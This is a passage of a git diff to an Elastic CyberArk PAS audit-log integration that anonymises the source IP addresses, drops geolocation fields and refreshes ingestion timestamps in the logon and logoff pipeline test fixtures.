02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"37.223.7.45\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:37:10.421007900Z", + "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", "action": "authentication_success", @@ -661,20 +637,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -694,7 +658,7 @@ "PSMP_ADB_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -702,7 +666,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:48Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "PSMP_ADB_localhost.localdomain", @@ -715,8 +679,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675195600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:10.421012900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", "action": "authentication_success", @@ -740,20 +704,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -773,7 +725,7 @@ "PSMPApp_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -781,7 +733,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:48Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "PSMPApp_localhost.localdomain", @@ -794,8 +746,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675197Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:10.421017400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", "action": "authentication_success", @@ -819,20 +771,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -852,7 +792,7 @@ "PSMPGW_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -860,7 +800,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:49Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "PSMPGW_localhost.localdomain", @@ -873,8 +813,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675198400Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:49\",\"IsoTimestamp\":\"2021-03-10T09:11:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:10.421021100Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:49\",\"IsoTimestamp\":\"2021-03-10T09:11:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", "action": "authentication_success", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log index 55eeab9c1a7..1fba00495ba 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log @@ -4,12 +4,12 @@ <5>1 2021-03-10T08:28:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:29","IsoTimestamp":"2021-03-10T08:28:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAGWUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:49:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"34.71.250.247"}}} +<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n Logoff\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T17:49:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Logoff\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.15"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json index 38115574bd3..edc4636d847 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json @@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904208100Z", + "ingested": "2021-12-09T13:37:11.641097400Z", "original": "\u003c5\u003e1 2021-03-08T18:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:19:15\",\"IsoTimestamp\":\"2021-03-08T18:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904217Z", + "ingested": "2021-12-09T13:37:11.641105700Z", "original": "\u003c5\u003e1 2021-03-08T18:59:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:59:23\",\"IsoTimestamp\":\"2021-03-08T18:59:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -183,7 +183,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904218600Z", + "ingested": "2021-12-09T13:37:11.641111200Z", "original": "\u003c5\u003e1 2021-03-10T08:28:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:28\",\"IsoTimestamp\":\"2021-03-10T08:28:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -250,7 +250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904220Z", + "ingested": "2021-12-09T13:37:11.641116600Z", "original": "\u003c5\u003e1 2021-03-10T08:28:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 